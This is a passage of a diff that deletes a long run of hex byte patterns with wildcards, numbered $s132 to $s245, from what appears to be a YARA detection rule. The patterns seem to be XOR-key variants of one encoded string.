-		$s132 = { 84 85 84 85 84 86 ?? ?? 84 86 84 85 84 86 ?? ?? 84 87 84 86 84 80 ?? ?? ?? ?? 84 80 84 86 84 80 ?? ?? ?? ?? 84 81 84 85 84 86 ?? ?? }
-		$s133 = { 85 84 85 84 85 87 ?? ?? 85 87 85 84 85 87 ?? ?? 85 86 85 87 85 81 ?? ?? ?? ?? 85 81 85 87 85 81 ?? ?? ?? ?? 85 80 85 84 85 87 ?? ?? }
-		$s134 = { 86 87 86 87 86 84 ?? ?? 86 84 86 87 86 84 ?? ?? 86 85 86 84 86 82 ?? ?? ?? ?? 86 82 86 84 86 82 ?? ?? ?? ?? 86 83 86 87 86 84 ?? ?? }
-		$s135 = { 87 86 87 86 87 85 ?? ?? 87 85 87 86 87 85 ?? ?? 87 84 87 85 87 83 ?? ?? ?? ?? 87 83 87 85 87 83 ?? ?? ?? ?? 87 82 87 86 87 85 ?? ?? }
-		$s136 = { 88 89 88 89 88 8A ?? ?? 88 8A 88 89 88 8A ?? ?? 88 8B 88 8A 88 8C ?? ?? ?? ?? 88 8C 88 8A 88 8C ?? ?? ?? ?? 88 8D 88 89 88 8A ?? ?? }
-		$s137 = { 89 88 89 88 89 8B ?? ?? 89 8B 89 88 89 8B ?? ?? 89 8A 89 8B 89 8D ?? ?? ?? ?? 89 8D 89 8B 89 8D ?? ?? ?? ?? 89 8C 89 88 89 8B ?? ?? }
-		$s138 = { 8A 8B 8A 8B 8A 88 ?? ?? 8A 88 8A 8B 8A 88 ?? ?? 8A 89 8A 88 8A 8E ?? ?? ?? ?? 8A 8E 8A 88 8A 8E ?? ?? ?? ?? 8A 8F 8A 8B 8A 88 ?? ?? }
-		$s139 = { 8B 8A 8B 8A 8B 89 ?? ?? 8B 89 8B 8A 8B 89 ?? ?? 8B 88 8B 89 8B 8F ?? ?? ?? ?? 8B 8F 8B 89 8B 8F ?? ?? ?? ?? 8B 8E 8B 8A 8B 89 ?? ?? }
-		$s140 = { 8C 8D 8C 8D 8C 8E ?? ?? 8C 8E 8C 8D 8C 8E ?? ?? 8C 8F 8C 8E 8C 88 ?? ?? ?? ?? 8C 88 8C 8E 8C 88 ?? ?? ?? ?? 8C 89 8C 8D 8C 8E ?? ?? }
-		$s141 = { 8D 8C 8D 8C 8D 8F ?? ?? 8D 8F 8D 8C 8D 8F ?? ?? 8D 8E 8D 8F 8D 89 ?? ?? ?? ?? 8D 89 8D 8F 8D 89 ?? ?? ?? ?? 8D 88 8D 8C 8D 8F ?? ?? }
-		$s142 = { 8E 8F 8E 8F 8E 8C ?? ?? 8E 8C 8E 8F 8E 8C ?? ?? 8E 8D 8E 8C 8E 8A ?? ?? ?? ?? 8E 8A 8E 8C 8E 8A ?? ?? ?? ?? 8E 8B 8E 8F 8E 8C ?? ?? }
-		$s143 = { 8F 8E 8F 8E 8F 8D ?? ?? 8F 8D 8F 8E 8F 8D ?? ?? 8F 8C 8F 8D 8F 8B ?? ?? ?? ?? 8F 8B 8F 8D 8F 8B ?? ?? ?? ?? 8F 8A 8F 8E 8F 8D ?? ?? }
-		$s144 = { 90 91 90 91 90 92 ?? ?? 90 92 90 91 90 92 ?? ?? 90 93 90 92 90 94 ?? ?? ?? ?? 90 94 90 92 90 94 ?? ?? ?? ?? 90 95 90 91 90 92 ?? ?? }
-		$s145 = { 91 90 91 90 91 93 ?? ?? 91 93 91 90 91 93 ?? ?? 91 92 91 93 91 95 ?? ?? ?? ?? 91 95 91 93 91 95 ?? ?? ?? ?? 91 94 91 90 91 93 ?? ?? }
-		$s146 = { 92 93 92 93 92 90 ?? ?? 92 90 92 93 92 90 ?? ?? 92 91 92 90 92 96 ?? ?? ?? ?? 92 96 92 90 92 96 ?? ?? ?? ?? 92 97 92 93 92 90 ?? ?? }
-		$s147 = { 93 92 93 92 93 91 ?? ?? 93 91 93 92 93 91 ?? ?? 93 90 93 91 93 97 ?? ?? ?? ?? 93 97 93 91 93 97 ?? ?? ?? ?? 93 96 93 92 93 91 ?? ?? }
-		$s148 = { 94 95 94 95 94 96 ?? ?? 94 96 94 95 94 96 ?? ?? 94 97 94 96 94 90 ?? ?? ?? ?? 94 90 94 96 94 90 ?? ?? ?? ?? 94 91 94 95 94 96 ?? ?? }
-		$s149 = { 95 94 95 94 95 97 ?? ?? 95 97 95 94 95 97 ?? ?? 95 96 95 97 95 91 ?? ?? ?? ?? 95 91 95 97 95 91 ?? ?? ?? ?? 95 90 95 94 95 97 ?? ?? }
-		$s150 = { 96 97 96 97 96 94 ?? ?? 96 94 96 97 96 94 ?? ?? 96 95 96 94 96 92 ?? ?? ?? ?? 96 92 96 94 96 92 ?? ?? ?? ?? 96 93 96 97 96 94 ?? ?? }
-		$s151 = { 97 96 97 96 97 95 ?? ?? 97 95 97 96 97 95 ?? ?? 97 94 97 95 97 93 ?? ?? ?? ?? 97 93 97 95 97 93 ?? ?? ?? ?? 97 92 97 96 97 95 ?? ?? }
-		$s152 = { 98 99 98 99 98 9A ?? ?? 98 9A 98 99 98 9A ?? ?? 98 9B 98 9A 98 9C ?? ?? ?? ?? 98 9C 98 9A 98 9C ?? ?? ?? ?? 98 9D 98 99 98 9A ?? ?? }
-		$s153 = { 99 98 99 98 99 9B ?? ?? 99 9B 99 98 99 9B ?? ?? 99 9A 99 9B 99 9D ?? ?? ?? ?? 99 9D 99 9B 99 9D ?? ?? ?? ?? 99 9C 99 98 99 9B ?? ?? }
-		$s154 = { 9A 9B 9A 9B 9A 98 ?? ?? 9A 98 9A 9B 9A 98 ?? ?? 9A 99 9A 98 9A 9E ?? ?? ?? ?? 9A 9E 9A 98 9A 9E ?? ?? ?? ?? 9A 9F 9A 9B 9A 98 ?? ?? }
-		$s155 = { 9B 9A 9B 9A 9B 99 ?? ?? 9B 99 9B 9A 9B 99 ?? ?? 9B 98 9B 99 9B 9F ?? ?? ?? ?? 9B 9F 9B 99 9B 9F ?? ?? ?? ?? 9B 9E 9B 9A 9B 99 ?? ?? }
-		$s156 = { 9C 9D 9C 9D 9C 9E ?? ?? 9C 9E 9C 9D 9C 9E ?? ?? 9C 9F 9C 9E 9C 98 ?? ?? ?? ?? 9C 98 9C 9E 9C 98 ?? ?? ?? ?? 9C 99 9C 9D 9C 9E ?? ?? }
-		$s157 = { 9D 9C 9D 9C 9D 9F ?? ?? 9D 9F 9D 9C 9D 9F ?? ?? 9D 9E 9D 9F 9D 99 ?? ?? ?? ?? 9D 99 9D 9F 9D 99 ?? ?? ?? ?? 9D 98 9D 9C 9D 9F ?? ?? }
-		$s158 = { 9E 9F 9E 9F 9E 9C ?? ?? 9E 9C 9E 9F 9E 9C ?? ?? 9E 9D 9E 9C 9E 9A ?? ?? ?? ?? 9E 9A 9E 9C 9E 9A ?? ?? ?? ?? 9E 9B 9E 9F 9E 9C ?? ?? }
-		$s159 = { 9F 9E 9F 9E 9F 9D ?? ?? 9F 9D 9F 9E 9F 9D ?? ?? 9F 9C 9F 9D 9F 9B ?? ?? ?? ?? 9F 9B 9F 9D 9F 9B ?? ?? ?? ?? 9F 9A 9F 9E 9F 9D ?? ?? }
-		$s160 = { A0 A1 A0 A1 A0 A2 ?? ?? A0 A2 A0 A1 A0 A2 ?? ?? A0 A3 A0 A2 A0 A4 ?? ?? ?? ?? A0 A4 A0 A2 A0 A4 ?? ?? ?? ?? A0 A5 A0 A1 A0 A2 ?? ?? }
-		$s161 = { A1 A0 A1 A0 A1 A3 ?? ?? A1 A3 A1 A0 A1 A3 ?? ?? A1 A2 A1 A3 A1 A5 ?? ?? ?? ?? A1 A5 A1 A3 A1 A5 ?? ?? ?? ?? A1 A4 A1 A0 A1 A3 ?? ?? }
-		$s162 = { A2 A3 A2 A3 A2 A0 ?? ?? A2 A0 A2 A3 A2 A0 ?? ?? A2 A1 A2 A0 A2 A6 ?? ?? ?? ?? A2 A6 A2 A0 A2 A6 ?? ?? ?? ?? A2 A7 A2 A3 A2 A0 ?? ?? }
-		$s163 = { A3 A2 A3 A2 A3 A1 ?? ?? A3 A1 A3 A2 A3 A1 ?? ?? A3 A0 A3 A1 A3 A7 ?? ?? ?? ?? A3 A7 A3 A1 A3 A7 ?? ?? ?? ?? A3 A6 A3 A2 A3 A1 ?? ?? }
-		$s164 = { A4 A5 A4 A5 A4 A6 ?? ?? A4 A6 A4 A5 A4 A6 ?? ?? A4 A7 A4 A6 A4 A0 ?? ?? ?? ?? A4 A0 A4 A6 A4 A0 ?? ?? ?? ?? A4 A1 A4 A5 A4 A6 ?? ?? }
-		$s165 = { A5 A4 A5 A4 A5 A7 ?? ?? A5 A7 A5 A4 A5 A7 ?? ?? A5 A6 A5 A7 A5 A1 ?? ?? ?? ?? A5 A1 A5 A7 A5 A1 ?? ?? ?? ?? A5 A0 A5 A4 A5 A7 ?? ?? }
-		$s166 = { A6 A7 A6 A7 A6 A4 ?? ?? A6 A4 A6 A7 A6 A4 ?? ?? A6 A5 A6 A4 A6 A2 ?? ?? ?? ?? A6 A2 A6 A4 A6 A2 ?? ?? ?? ?? A6 A3 A6 A7 A6 A4 ?? ?? }
-		$s167 = { A7 A6 A7 A6 A7 A5 ?? ?? A7 A5 A7 A6 A7 A5 ?? ?? A7 A4 A7 A5 A7 A3 ?? ?? ?? ?? A7 A3 A7 A5 A7 A3 ?? ?? ?? ?? A7 A2 A7 A6 A7 A5 ?? ?? }
-		$s168 = { A8 A9 A8 A9 A8 AA ?? ?? A8 AA A8 A9 A8 AA ?? ?? A8 AB A8 AA A8 AC ?? ?? ?? ?? A8 AC A8 AA A8 AC ?? ?? ?? ?? A8 AD A8 A9 A8 AA ?? ?? }
-		$s169 = { A9 A8 A9 A8 A9 AB ?? ?? A9 AB A9 A8 A9 AB ?? ?? A9 AA A9 AB A9 AD ?? ?? ?? ?? A9 AD A9 AB A9 AD ?? ?? ?? ?? A9 AC A9 A8 A9 AB ?? ?? }
-		$s170 = { AA AB AA AB AA A8 ?? ?? AA A8 AA AB AA A8 ?? ?? AA A9 AA A8 AA AE ?? ?? ?? ?? AA AE AA A8 AA AE ?? ?? ?? ?? AA AF AA AB AA A8 ?? ?? }
-		$s171 = { AB AA AB AA AB A9 ?? ?? AB A9 AB AA AB A9 ?? ?? AB A8 AB A9 AB AF ?? ?? ?? ?? AB AF AB A9 AB AF ?? ?? ?? ?? AB AE AB AA AB A9 ?? ?? }
-		$s172 = { AC AD AC AD AC AE ?? ?? AC AE AC AD AC AE ?? ?? AC AF AC AE AC A8 ?? ?? ?? ?? AC A8 AC AE AC A8 ?? ?? ?? ?? AC A9 AC AD AC AE ?? ?? }
-		$s173 = { AD AC AD AC AD AF ?? ?? AD AF AD AC AD AF ?? ?? AD AE AD AF AD A9 ?? ?? ?? ?? AD A9 AD AF AD A9 ?? ?? ?? ?? AD A8 AD AC AD AF ?? ?? }
-		$s174 = { AE AF AE AF AE AC ?? ?? AE AC AE AF AE AC ?? ?? AE AD AE AC AE AA ?? ?? ?? ?? AE AA AE AC AE AA ?? ?? ?? ?? AE AB AE AF AE AC ?? ?? }
-		$s175 = { AF AE AF AE AF AD ?? ?? AF AD AF AE AF AD ?? ?? AF AC AF AD AF AB ?? ?? ?? ?? AF AB AF AD AF AB ?? ?? ?? ?? AF AA AF AE AF AD ?? ?? }
-		$s176 = { B0 B1 B0 B1 B0 B2 ?? ?? B0 B2 B0 B1 B0 B2 ?? ?? B0 B3 B0 B2 B0 B4 ?? ?? ?? ?? B0 B4 B0 B2 B0 B4 ?? ?? ?? ?? B0 B5 B0 B1 B0 B2 ?? ?? }
-		$s177 = { B1 B0 B1 B0 B1 B3 ?? ?? B1 B3 B1 B0 B1 B3 ?? ?? B1 B2 B1 B3 B1 B5 ?? ?? ?? ?? B1 B5 B1 B3 B1 B5 ?? ?? ?? ?? B1 B4 B1 B0 B1 B3 ?? ?? }
-		$s178 = { B2 B3 B2 B3 B2 B0 ?? ?? B2 B0 B2 B3 B2 B0 ?? ?? B2 B1 B2 B0 B2 B6 ?? ?? ?? ?? B2 B6 B2 B0 B2 B6 ?? ?? ?? ?? B2 B7 B2 B3 B2 B0 ?? ?? }
-		$s179 = { B3 B2 B3 B2 B3 B1 ?? ?? B3 B1 B3 B2 B3 B1 ?? ?? B3 B0 B3 B1 B3 B7 ?? ?? ?? ?? B3 B7 B3 B1 B3 B7 ?? ?? ?? ?? B3 B6 B3 B2 B3 B1 ?? ?? }
-		$s180 = { B4 B5 B4 B5 B4 B6 ?? ?? B4 B6 B4 B5 B4 B6 ?? ?? B4 B7 B4 B6 B4 B0 ?? ?? ?? ?? B4 B0 B4 B6 B4 B0 ?? ?? ?? ?? B4 B1 B4 B5 B4 B6 ?? ?? }
-		$s181 = { B5 B4 B5 B4 B5 B7 ?? ?? B5 B7 B5 B4 B5 B7 ?? ?? B5 B6 B5 B7 B5 B1 ?? ?? ?? ?? B5 B1 B5 B7 B5 B1 ?? ?? ?? ?? B5 B0 B5 B4 B5 B7 ?? ?? }
-		$s182 = { B6 B7 B6 B7 B6 B4 ?? ?? B6 B4 B6 B7 B6 B4 ?? ?? B6 B5 B6 B4 B6 B2 ?? ?? ?? ?? B6 B2 B6 B4 B6 B2 ?? ?? ?? ?? B6 B3 B6 B7 B6 B4 ?? ?? }
-		$s183 = { B7 B6 B7 B6 B7 B5 ?? ?? B7 B5 B7 B6 B7 B5 ?? ?? B7 B4 B7 B5 B7 B3 ?? ?? ?? ?? B7 B3 B7 B5 B7 B3 ?? ?? ?? ?? B7 B2 B7 B6 B7 B5 ?? ?? }
-		$s184 = { B8 B9 B8 B9 B8 BA ?? ?? B8 BA B8 B9 B8 BA ?? ?? B8 BB B8 BA B8 BC ?? ?? ?? ?? B8 BC B8 BA B8 BC ?? ?? ?? ?? B8 BD B8 B9 B8 BA ?? ?? }
-		$s185 = { B9 B8 B9 B8 B9 BB ?? ?? B9 BB B9 B8 B9 BB ?? ?? B9 BA B9 BB B9 BD ?? ?? ?? ?? B9 BD B9 BB B9 BD ?? ?? ?? ?? B9 BC B9 B8 B9 BB ?? ?? }
-		$s186 = { BA BB BA BB BA B8 ?? ?? BA B8 BA BB BA B8 ?? ?? BA B9 BA B8 BA BE ?? ?? ?? ?? BA BE BA B8 BA BE ?? ?? ?? ?? BA BF BA BB BA B8 ?? ?? }
-		$s187 = { BB BA BB BA BB B9 ?? ?? BB B9 BB BA BB B9 ?? ?? BB B8 BB B9 BB BF ?? ?? ?? ?? BB BF BB B9 BB BF ?? ?? ?? ?? BB BE BB BA BB B9 ?? ?? }
-		$s188 = { BC BD BC BD BC BE ?? ?? BC BE BC BD BC BE ?? ?? BC BF BC BE BC B8 ?? ?? ?? ?? BC B8 BC BE BC B8 ?? ?? ?? ?? BC B9 BC BD BC BE ?? ?? }
-		$s189 = { BD BC BD BC BD BF ?? ?? BD BF BD BC BD BF ?? ?? BD BE BD BF BD B9 ?? ?? ?? ?? BD B9 BD BF BD B9 ?? ?? ?? ?? BD B8 BD BC BD BF ?? ?? }
-		$s190 = { BE BF BE BF BE BC ?? ?? BE BC BE BF BE BC ?? ?? BE BD BE BC BE BA ?? ?? ?? ?? BE BA BE BC BE BA ?? ?? ?? ?? BE BB BE BF BE BC ?? ?? }
-		$s191 = { BF BE BF BE BF BD ?? ?? BF BD BF BE BF BD ?? ?? BF BC BF BD BF BB ?? ?? ?? ?? BF BB BF BD BF BB ?? ?? ?? ?? BF BA BF BE BF BD ?? ?? }
-		$s192 = { C0 C1 C0 C1 C0 C2 ?? ?? C0 C2 C0 C1 C0 C2 ?? ?? C0 C3 C0 C2 C0 C4 ?? ?? ?? ?? C0 C4 C0 C2 C0 C4 ?? ?? ?? ?? C0 C5 C0 C1 C0 C2 ?? ?? }
-		$s193 = { C1 C0 C1 C0 C1 C3 ?? ?? C1 C3 C1 C0 C1 C3 ?? ?? C1 C2 C1 C3 C1 C5 ?? ?? ?? ?? C1 C5 C1 C3 C1 C5 ?? ?? ?? ?? C1 C4 C1 C0 C1 C3 ?? ?? }
-		$s194 = { C2 C3 C2 C3 C2 C0 ?? ?? C2 C0 C2 C3 C2 C0 ?? ?? C2 C1 C2 C0 C2 C6 ?? ?? ?? ?? C2 C6 C2 C0 C2 C6 ?? ?? ?? ?? C2 C7 C2 C3 C2 C0 ?? ?? }
-		$s195 = { C3 C2 C3 C2 C3 C1 ?? ?? C3 C1 C3 C2 C3 C1 ?? ?? C3 C0 C3 C1 C3 C7 ?? ?? ?? ?? C3 C7 C3 C1 C3 C7 ?? ?? ?? ?? C3 C6 C3 C2 C3 C1 ?? ?? }
-		$s196 = { C4 C5 C4 C5 C4 C6 ?? ?? C4 C6 C4 C5 C4 C6 ?? ?? C4 C7 C4 C6 C4 C0 ?? ?? ?? ?? C4 C0 C4 C6 C4 C0 ?? ?? ?? ?? C4 C1 C4 C5 C4 C6 ?? ?? }
-		$s197 = { C5 C4 C5 C4 C5 C7 ?? ?? C5 C7 C5 C4 C5 C7 ?? ?? C5 C6 C5 C7 C5 C1 ?? ?? ?? ?? C5 C1 C5 C7 C5 C1 ?? ?? ?? ?? C5 C0 C5 C4 C5 C7 ?? ?? }
-		$s198 = { C6 C7 C6 C7 C6 C4 ?? ?? C6 C4 C6 C7 C6 C4 ?? ?? C6 C5 C6 C4 C6 C2 ?? ?? ?? ?? C6 C2 C6 C4 C6 C2 ?? ?? ?? ?? C6 C3 C6 C7 C6 C4 ?? ?? }
-		$s199 = { C7 C6 C7 C6 C7 C5 ?? ?? C7 C5 C7 C6 C7 C5 ?? ?? C7 C4 C7 C5 C7 C3 ?? ?? ?? ?? C7 C3 C7 C5 C7 C3 ?? ?? ?? ?? C7 C2 C7 C6 C7 C5 ?? ?? }
-		$s200 = { C8 C9 C8 C9 C8 CA ?? ?? C8 CA C8 C9 C8 CA ?? ?? C8 CB C8 CA C8 CC ?? ?? ?? ?? C8 CC C8 CA C8 CC ?? ?? ?? ?? C8 CD C8 C9 C8 CA ?? ?? }
-		$s201 = { C9 C8 C9 C8 C9 CB ?? ?? C9 CB C9 C8 C9 CB ?? ?? C9 CA C9 CB C9 CD ?? ?? ?? ?? C9 CD C9 CB C9 CD ?? ?? ?? ?? C9 CC C9 C8 C9 CB ?? ?? }
-		$s202 = { CA CB CA CB CA C8 ?? ?? CA C8 CA CB CA C8 ?? ?? CA C9 CA C8 CA CE ?? ?? ?? ?? CA CE CA C8 CA CE ?? ?? ?? ?? CA CF CA CB CA C8 ?? ?? }
-		$s203 = { CB CA CB CA CB C9 ?? ?? CB C9 CB CA CB C9 ?? ?? CB C8 CB C9 CB CF ?? ?? ?? ?? CB CF CB C9 CB CF ?? ?? ?? ?? CB CE CB CA CB C9 ?? ?? }
-		$s204 = { CC CD CC CD CC CE ?? ?? CC CE CC CD CC CE ?? ?? CC CF CC CE CC C8 ?? ?? ?? ?? CC C8 CC CE CC C8 ?? ?? ?? ?? CC C9 CC CD CC CE ?? ?? }
-		$s205 = { CD CC CD CC CD CF ?? ?? CD CF CD CC CD CF ?? ?? CD CE CD CF CD C9 ?? ?? ?? ?? CD C9 CD CF CD C9 ?? ?? ?? ?? CD C8 CD CC CD CF ?? ?? }
-		$s206 = { CE CF CE CF CE CC ?? ?? CE CC CE CF CE CC ?? ?? CE CD CE CC CE CA ?? ?? ?? ?? CE CA CE CC CE CA ?? ?? ?? ?? CE CB CE CF CE CC ?? ?? }
-		$s207 = { CF CE CF CE CF CD ?? ?? CF CD CF CE CF CD ?? ?? CF CC CF CD CF CB ?? ?? ?? ?? CF CB CF CD CF CB ?? ?? ?? ?? CF CA CF CE CF CD ?? ?? }
-		$s208 = { D0 D1 D0 D1 D0 D2 ?? ?? D0 D2 D0 D1 D0 D2 ?? ?? D0 D3 D0 D2 D0 D4 ?? ?? ?? ?? D0 D4 D0 D2 D0 D4 ?? ?? ?? ?? D0 D5 D0 D1 D0 D2 ?? ?? }
-		$s209 = { D1 D0 D1 D0 D1 D3 ?? ?? D1 D3 D1 D0 D1 D3 ?? ?? D1 D2 D1 D3 D1 D5 ?? ?? ?? ?? D1 D5 D1 D3 D1 D5 ?? ?? ?? ?? D1 D4 D1 D0 D1 D3 ?? ?? }
-		$s210 = { D2 D3 D2 D3 D2 D0 ?? ?? D2 D0 D2 D3 D2 D0 ?? ?? D2 D1 D2 D0 D2 D6 ?? ?? ?? ?? D2 D6 D2 D0 D2 D6 ?? ?? ?? ?? D2 D7 D2 D3 D2 D0 ?? ?? }
-		$s211 = { D3 D2 D3 D2 D3 D1 ?? ?? D3 D1 D3 D2 D3 D1 ?? ?? D3 D0 D3 D1 D3 D7 ?? ?? ?? ?? D3 D7 D3 D1 D3 D7 ?? ?? ?? ?? D3 D6 D3 D2 D3 D1 ?? ?? }
-		$s212 = { D4 D5 D4 D5 D4 D6 ?? ?? D4 D6 D4 D5 D4 D6 ?? ?? D4 D7 D4 D6 D4 D0 ?? ?? ?? ?? D4 D0 D4 D6 D4 D0 ?? ?? ?? ?? D4 D1 D4 D5 D4 D6 ?? ?? }
-		$s213 = { D5 D4 D5 D4 D5 D7 ?? ?? D5 D7 D5 D4 D5 D7 ?? ?? D5 D6 D5 D7 D5 D1 ?? ?? ?? ?? D5 D1 D5 D7 D5 D1 ?? ?? ?? ?? D5 D0 D5 D4 D5 D7 ?? ?? }
-		$s214 = { D6 D7 D6 D7 D6 D4 ?? ?? D6 D4 D6 D7 D6 D4 ?? ?? D6 D5 D6 D4 D6 D2 ?? ?? ?? ?? D6 D2 D6 D4 D6 D2 ?? ?? ?? ?? D6 D3 D6 D7 D6 D4 ?? ?? }
-		$s215 = { D7 D6 D7 D6 D7 D5 ?? ?? D7 D5 D7 D6 D7 D5 ?? ?? D7 D4 D7 D5 D7 D3 ?? ?? ?? ?? D7 D3 D7 D5 D7 D3 ?? ?? ?? ?? D7 D2 D7 D6 D7 D5 ?? ?? }
-		$s216 = { D8 D9 D8 D9 D8 DA ?? ?? D8 DA D8 D9 D8 DA ?? ?? D8 DB D8 DA D8 DC ?? ?? ?? ?? D8 DC D8 DA D8 DC ?? ?? ?? ?? D8 DD D8 D9 D8 DA ?? ?? }
-		$s217 = { D9 D8 D9 D8 D9 DB ?? ?? D9 DB D9 D8 D9 DB ?? ?? D9 DA D9 DB D9 DD ?? ?? ?? ?? D9 DD D9 DB D9 DD ?? ?? ?? ?? D9 DC D9 D8 D9 DB ?? ?? }
-		$s218 = { DA DB DA DB DA D8 ?? ?? DA D8 DA DB DA D8 ?? ?? DA D9 DA D8 DA DE ?? ?? ?? ?? DA DE DA D8 DA DE ?? ?? ?? ?? DA DF DA DB DA D8 ?? ?? }
-		$s219 = { DB DA DB DA DB D9 ?? ?? DB D9 DB DA DB D9 ?? ?? DB D8 DB D9 DB DF ?? ?? ?? ?? DB DF DB D9 DB DF ?? ?? ?? ?? DB DE DB DA DB D9 ?? ?? }
-		$s220 = { DC DD DC DD DC DE ?? ?? DC DE DC DD DC DE ?? ?? DC DF DC DE DC D8 ?? ?? ?? ?? DC D8 DC DE DC D8 ?? ?? ?? ?? DC D9 DC DD DC DE ?? ?? }
-		$s221 = { DD DC DD DC DD DF ?? ?? DD DF DD DC DD DF ?? ?? DD DE DD DF DD D9 ?? ?? ?? ?? DD D9 DD DF DD D9 ?? ?? ?? ?? DD D8 DD DC DD DF ?? ?? }
-		$s222 = { DE DF DE DF DE DC ?? ?? DE DC DE DF DE DC ?? ?? DE DD DE DC DE DA ?? ?? ?? ?? DE DA DE DC DE DA ?? ?? ?? ?? DE DB DE DF DE DC ?? ?? }
-		$s223 = { DF DE DF DE DF DD ?? ?? DF DD DF DE DF DD ?? ?? DF DC DF DD DF DB ?? ?? ?? ?? DF DB DF DD DF DB ?? ?? ?? ?? DF DA DF DE DF DD ?? ?? }
-		$s224 = { E0 E1 E0 E1 E0 E2 ?? ?? E0 E2 E0 E1 E0 E2 ?? ?? E0 E3 E0 E2 E0 E4 ?? ?? ?? ?? E0 E4 E0 E2 E0 E4 ?? ?? ?? ?? E0 E5 E0 E1 E0 E2 ?? ?? }
-		$s225 = { E1 E0 E1 E0 E1 E3 ?? ?? E1 E3 E1 E0 E1 E3 ?? ?? E1 E2 E1 E3 E1 E5 ?? ?? ?? ?? E1 E5 E1 E3 E1 E5 ?? ?? ?? ?? E1 E4 E1 E0 E1 E3 ?? ?? }
-		$s226 = { E2 E3 E2 E3 E2 E0 ?? ?? E2 E0 E2 E3 E2 E0 ?? ?? E2 E1 E2 E0 E2 E6 ?? ?? ?? ?? E2 E6 E2 E0 E2 E6 ?? ?? ?? ?? E2 E7 E2 E3 E2 E0 ?? ?? }
-		$s227 = { E3 E2 E3 E2 E3 E1 ?? ?? E3 E1 E3 E2 E3 E1 ?? ?? E3 E0 E3 E1 E3 E7 ?? ?? ?? ?? E3 E7 E3 E1 E3 E7 ?? ?? ?? ?? E3 E6 E3 E2 E3 E1 ?? ?? }
-		$s228 = { E4 E5 E4 E5 E4 E6 ?? ?? E4 E6 E4 E5 E4 E6 ?? ?? E4 E7 E4 E6 E4 E0 ?? ?? ?? ?? E4 E0 E4 E6 E4 E0 ?? ?? ?? ?? E4 E1 E4 E5 E4 E6 ?? ?? }
-		$s229 = { E5 E4 E5 E4 E5 E7 ?? ?? E5 E7 E5 E4 E5 E7 ?? ?? E5 E6 E5 E7 E5 E1 ?? ?? ?? ?? E5 E1 E5 E7 E5 E1 ?? ?? ?? ?? E5 E0 E5 E4 E5 E7 ?? ?? }
-		$s230 = { E6 E7 E6 E7 E6 E4 ?? ?? E6 E4 E6 E7 E6 E4 ?? ?? E6 E5 E6 E4 E6 E2 ?? ?? ?? ?? E6 E2 E6 E4 E6 E2 ?? ?? ?? ?? E6 E3 E6 E7 E6 E4 ?? ?? }
-		$s231 = { E7 E6 E7 E6 E7 E5 ?? ?? E7 E5 E7 E6 E7 E5 ?? ?? E7 E4 E7 E5 E7 E3 ?? ?? ?? ?? E7 E3 E7 E5 E7 E3 ?? ?? ?? ?? E7 E2 E7 E6 E7 E5 ?? ?? }
-		$s232 = { E8 E9 E8 E9 E8 EA ?? ?? E8 EA E8 E9 E8 EA ?? ?? E8 EB E8 EA E8 EC ?? ?? ?? ?? E8 EC E8 EA E8 EC ?? ?? ?? ?? E8 ED E8 E9 E8 EA ?? ?? }
-		$s233 = { E9 E8 E9 E8 E9 EB ?? ?? E9 EB E9 E8 E9 EB ?? ?? E9 EA E9 EB E9 ED ?? ?? ?? ?? E9 ED E9 EB E9 ED ?? ?? ?? ?? E9 EC E9 E8 E9 EB ?? ?? }
-		$s234 = { EA EB EA EB EA E8 ?? ?? EA E8 EA EB EA E8 ?? ?? EA E9 EA E8 EA EE ?? ?? ?? ?? EA EE EA E8 EA EE ?? ?? ?? ?? EA EF EA EB EA E8 ?? ?? }
-		$s235 = { EB EA EB EA EB E9 ?? ?? EB E9 EB EA EB E9 ?? ?? EB E8 EB E9 EB EF ?? ?? ?? ?? EB EF EB E9 EB EF ?? ?? ?? ?? EB EE EB EA EB E9 ?? ?? }
-		$s236 = { EC ED EC ED EC EE ?? ?? EC EE EC ED EC EE ?? ?? EC EF EC EE EC E8 ?? ?? ?? ?? EC E8 EC EE EC E8 ?? ?? ?? ?? EC E9 EC ED EC EE ?? ?? }
-		$s237 = { ED EC ED EC ED EF ?? ?? ED EF ED EC ED EF ?? ?? ED EE ED EF ED E9 ?? ?? ?? ?? ED E9 ED EF ED E9 ?? ?? ?? ?? ED E8 ED EC ED EF ?? ?? }
-		$s238 = { EE EF EE EF EE EC ?? ?? EE EC EE EF EE EC ?? ?? EE ED EE EC EE EA ?? ?? ?? ?? EE EA EE EC EE EA ?? ?? ?? ?? EE EB EE EF EE EC ?? ?? }
-		$s239 = { EF EE EF EE EF ED ?? ?? EF ED EF EE EF ED ?? ?? EF EC EF ED EF EB ?? ?? ?? ?? EF EB EF ED EF EB ?? ?? ?? ?? EF EA EF EE EF ED ?? ?? }
-		$s240 = { F0 F1 F0 F1 F0 F2 ?? ?? F0 F2 F0 F1 F0 F2 ?? ?? F0 F3 F0 F2 F0 F4 ?? ?? ?? ?? F0 F4 F0 F2 F0 F4 ?? ?? ?? ?? F0 F5 F0 F1 F0 F2 ?? ?? }
-		$s241 = { F1 F0 F1 F0 F1 F3 ?? ?? F1 F3 F1 F0 F1 F3 ?? ?? F1 F2 F1 F3 F1 F5 ?? ?? ?? ?? F1 F5 F1 F3 F1 F5 ?? ?? ?? ?? F1 F4 F1 F0 F1 F3 ?? ?? }
-		$s242 = { F2 F3 F2 F3 F2 F0 ?? ?? F2 F0 F2 F3 F2 F0 ?? ?? F2 F1 F2 F0 F2 F6 ?? ?? ?? ?? F2 F6 F2 F0 F2 F6 ?? ?? ?? ?? F2 F7 F2 F3 F2 F0 ?? ?? }
-		$s243 = { F3 F2 F3 F2 F3 F1 ?? ?? F3 F1 F3 F2 F3 F1 ?? ?? F3 F0 F3 F1 F3 F7 ?? ?? ?? ?? F3 F7 F3 F1 F3 F7 ?? ?? ?? ?? F3 F6 F3 F2 F3 F1 ?? ?? }
-		$s244 = { F4 F5 F4 F5 F4 F6 ?? ?? F4 F6 F4 F5 F4 F6 ?? ?? F4 F7 F4 F6 F4 F0 ?? ?? ?? ?? F4 F0 F4 F6 F4 F0 ?? ?? ?? ?? F4 F1 F4 F5 F4 F6 ?? ?? }
-		$s245 = { F5 F4 F5 F4 F5 F7 ?? ?? F5 F7 F5 F4 F5 F7 ?? ?? F5 F6 F5 F7 F5 F1 ?? ?? ?? ?? F5 F1 F5 F7 F5 F1 ?? ?? ?? ?? F5 F0 F5 F4 F5 F7 ?? ?? }
